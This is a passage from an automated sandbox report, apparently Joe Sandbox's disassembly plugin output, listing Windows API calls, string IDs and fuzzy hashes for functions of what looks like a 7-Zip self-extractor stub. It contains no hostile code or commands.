                                              • Opcode Fuzzy Hash: 4bf28155caf3c0e3e70e3806f95481066414134a08221828c68301312901f378
                                              • Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58
                                              APIs
                                              • _CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ExceptionThrow
                                              • String ID: $JA$4JA$DJA$TJA$hJA$xJA
                                              • API String ID: 432778473-803145960
                                              • Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                              • Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
                                              • Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                              • Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C
                                              APIs
                                                • Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT ref: 0040BA4B
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040C20D
                                                • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT ref: 0040ADD6
                                                • Part of subcall function 0040ADC3: memmove.MSVCRT ref: 0040ADF0
                                                • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT ref: 0040AE00
                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040C245
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??2@$??3@$memmove
                                              • String ID: IA$IA$IA
                                              • API String ID: 4294387087-924693538
                                              • Opcode ID: 25bd9c5d11500a263ce70e904d3ee1b17a650f17d05f8e34950ac6ada3abf85e
                                              • Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
                                              • Opcode Fuzzy Hash: 25bd9c5d11500a263ce70e904d3ee1b17a650f17d05f8e34950ac6ada3abf85e
                                              • Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??2@??3@ExceptionThrowmemcpy
                                              • String ID: IA
                                              • API String ID: 3462485524-3293647318
                                              • Opcode ID: b4a8c25ace2405613e396bab0ea8aa047c3f3994b68221911c6374fa7b748fe4
                                              • Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
                                              • Opcode Fuzzy Hash: b4a8c25ace2405613e396bab0ea8aa047c3f3994b68221911c6374fa7b748fe4
                                              • Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: wsprintf$ExitProcesslstrcat
                                              • String ID: 0x%p
                                              • API String ID: 2530384128-1745605757
                                              • Opcode ID: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                              • Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
                                              • Opcode Fuzzy Hash: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                              • Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA
                                              APIs
                                                • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
                                                • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9
                                              • GetSystemMetrics.USER32(00000007), ref: 00407A51
                                              • GetSystemMetrics.USER32(00000007), ref: 00407A62
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00407B29
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: MetricsSystem$??3@
                                              • String ID: 100%%
                                              • API String ID: 2562992111-568723177
                                              • Opcode ID: a6d46403d3ab7c93de890dee3a90e086962fb6a60ba4a888f869f1a3a2cd4496
                                              • Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
                                              • Opcode Fuzzy Hash: a6d46403d3ab7c93de890dee3a90e086962fb6a60ba4a888f869f1a3a2cd4496
                                              • Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99
                                              APIs
                                              • wsprintfW.USER32 ref: 00407A12
                                                • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                              • GetDlgItem.USER32(?,000004B3), ref: 004079C6
                                                • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004079E4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: TextWindow$ItemLength$??3@wsprintf
                                              • String ID: (%u%s)
                                              • API String ID: 3595513934-2496177969
                                              • Opcode ID: d8d3263f117d054de406d40740ab212d70496f94eda5c21348b34193b536a31f
                                              • Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
                                              • Opcode Fuzzy Hash: d8d3263f117d054de406d40740ab212d70496f94eda5c21348b34193b536a31f
                                              • Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
                                              • GetProcAddress.KERNEL32(00000000), ref: 00402211
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetNativeSystemInfo$kernel32
                                              • API String ID: 2574300362-3846845290
                                              • Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                              • Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
                                              • Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                              • Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
                                              • GetProcAddress.KERNEL32(00000000), ref: 0040219F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64RevertWow64FsRedirection$kernel32
                                              • API String ID: 2574300362-3900151262
                                              • Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                              • Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
                                              • Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                              • Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
                                              • GetProcAddress.KERNEL32(00000000), ref: 004021D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64DisableWow64FsRedirection$kernel32
                                              • API String ID: 2574300362-736604160
                                              • Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                              • Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
                                              • Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                              • Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC
                                              APIs
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00402B6F
                                                • Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00402ADC
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00402AF7
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00402AFF
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@$ByteCharMultiWide
                                              • String ID:
                                              • API String ID: 1731127917-0
                                              • Opcode ID: 50b584c12c0549c181a405badd4e291d8d0af70559505291a0452ef1c321a8e8
                                              • Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
                                              • Opcode Fuzzy Hash: 50b584c12c0549c181a405badd4e291d8d0af70559505291a0452ef1c321a8e8
                                              • Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658
                                              APIs
                                              • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
                                              • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
                                              • wsprintfW.USER32 ref: 00403FFB
                                              • GetFileAttributesW.KERNEL32(?), ref: 00404016
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: PathTemp$AttributesFilewsprintf
                                              • String ID:
                                              • API String ID: 1746483863-0
                                              • Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                              • Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
                                              • Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                              • Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88
                                              APIs
                                              • CharUpperW.USER32(?,771AE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                              • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                              • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
                                              • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: CharUpper
                                              • String ID:
                                              • API String ID: 9403516-0
                                              • Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                              • Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
                                              • Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                              • Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64
                                              APIs
                                                • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
                                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
                                              • GetDlgItem.USER32(?,000004B7), ref: 00408020
                                              • SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E
                                                • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
                                              • String ID:
                                              • API String ID: 2538916108-0
                                              • Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                              • Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
                                              • Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                              • Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54
                                              APIs
                                              • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
                                              • GetSystemMetrics.USER32(00000031), ref: 0040683A
                                              • CreateFontIndirectW.GDI32(?), ref: 00406849
                                              • DeleteObject.GDI32(00000000), ref: 00406878
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                              • String ID:
                                              • API String ID: 1900162674-0
                                              • Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                              • Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
                                              • Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                              • Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54
                                              APIs
                                              • memset.MSVCRT ref: 0040749F
                                              • SHBrowseForFolderW.SHELL32(?), ref: 004074B8
                                              • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
                                              • SHGetMalloc.SHELL32(00000000), ref: 004074FE
                                                • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                              • String ID:
                                              • API String ID: 1557639607-0
                                              • Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                              • Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
                                              • Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                              • Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75
                                              APIs
                                              • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00402801
                                                • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT ref: 0040114B
                                                • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT ref: 00401171
                                              • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00402839
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@$EnvironmentExpandStrings$??2@
                                              • String ID:
                                              • API String ID: 612612615-0
                                              • Opcode ID: ea11be91e446348d531786061001a4dbe4b0a50377fce726b76dd95ab74a305a
                                              • Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
                                              • Opcode Fuzzy Hash: ea11be91e446348d531786061001a4dbe4b0a50377fce726b76dd95ab74a305a
                                              • Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8
                                              APIs
                                                • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403AFD
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403B05
                                              • SetWindowTextW.USER32(?,?), ref: 00403B12
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00403B1D
                                              Memory Dump Source
